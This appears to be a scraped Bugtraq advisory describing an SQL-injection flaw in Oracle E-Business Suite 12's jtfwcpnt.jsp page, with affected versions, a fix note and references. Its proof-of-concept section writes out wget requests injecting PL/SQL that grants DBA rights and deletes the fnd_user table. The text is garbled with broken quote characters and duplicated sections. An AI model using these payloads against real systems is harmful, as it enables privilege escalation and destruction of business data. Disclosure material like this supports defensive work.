Oracle E-Business Suite Financials 'jtfwcpnt.jsp' SQL Injection Vulnerability
BID:39510
Info
Oracle E-Business Suite Financials 'jtfwcpnt.jsp' SQL Injection Vulnerability
| Bugtraq ID: | 39510 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 15 2010 12:00AM |
| Updated: | May 26 2011 09:01PM |
| Credit: | Joxean Koret |
| Vulnerable: |
Oracle E-Business Suite 12 12.1.2 Oracle E-Business Suite 12 12.1.1 Oracle E-Business Suite 12 12.0.6 Oracle E-Business Suite 12 12.0.5 Oracle E-Business Suite 12 12.0.4 Oracle E-Business Suite 12 12.0.3 Oracle E-Business Suite 12 12.0.2 Oracle E-Business Suite 12 12.0.1 Oracle E-Business Suite 12 12.0 Oracle E-Business Suite 12 12.1 |
| Not Vulnerable: | |
Discussion
Oracle E-Business Suite Financials 'jtfwcpnt.jsp' SQL Injection Vulnerability
Oracle E-Business Suite Financials is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Oracle E-Business Suite 12 is vulnerable; other versions may be affected.
Oracle E-Business Suite Financials is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Oracle E-Business Suite 12 is vulnerable; other versions may be affected.
Exploit / POC
Oracle E-Business Suite Financials 'jtfwcpnt.jsp' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example requests are available:
$ export TARGET=â?http://www.example.com:<port>/OA_HTMLâ?
$ wget -O - â??$TARGET/OA.jspâ? "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'grant%20dba%20to%20mom';%20end;â?
$ wget -O - â??$TARGET/OA.jspâ? "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'delete%20from%20apps.fnd_user';%20commit;end;â?
Attackers can use a browser to exploit this issue.
The following example requests are available:
$ export TARGET=â?http://www.example.com:<port>/OA_HTMLâ?
$ wget -O - â??$TARGET/OA.jspâ? "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'grant%20dba%20to%20mom';%20end;â?
$ wget -O - â??$TARGET/OA.jspâ? "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'delete%20from%20apps.fnd_user';%20commit;end;â?
Solution / Fix
Oracle E-Business Suite Financials 'jtfwcpnt.jsp' SQL Injection Vulnerability
Solution:
Reports indicate vendor updates are available in the July 2010 CPU; this has not been confirmed.
Solution:
Reports indicate vendor updates are available in the July 2010 CPU; this has not been confirmed.
References
Oracle E-Business Suite Financials 'jtfwcpnt.jsp' SQL Injection Vulnerability
References:
References:
- Hackproofing Oracle Financials (Joxean Koret)
- Oracle E-Business Suite Financials Homepage (Oracle)
- Hackproofing Oracle Financials 11i & R12 (Joxean Koret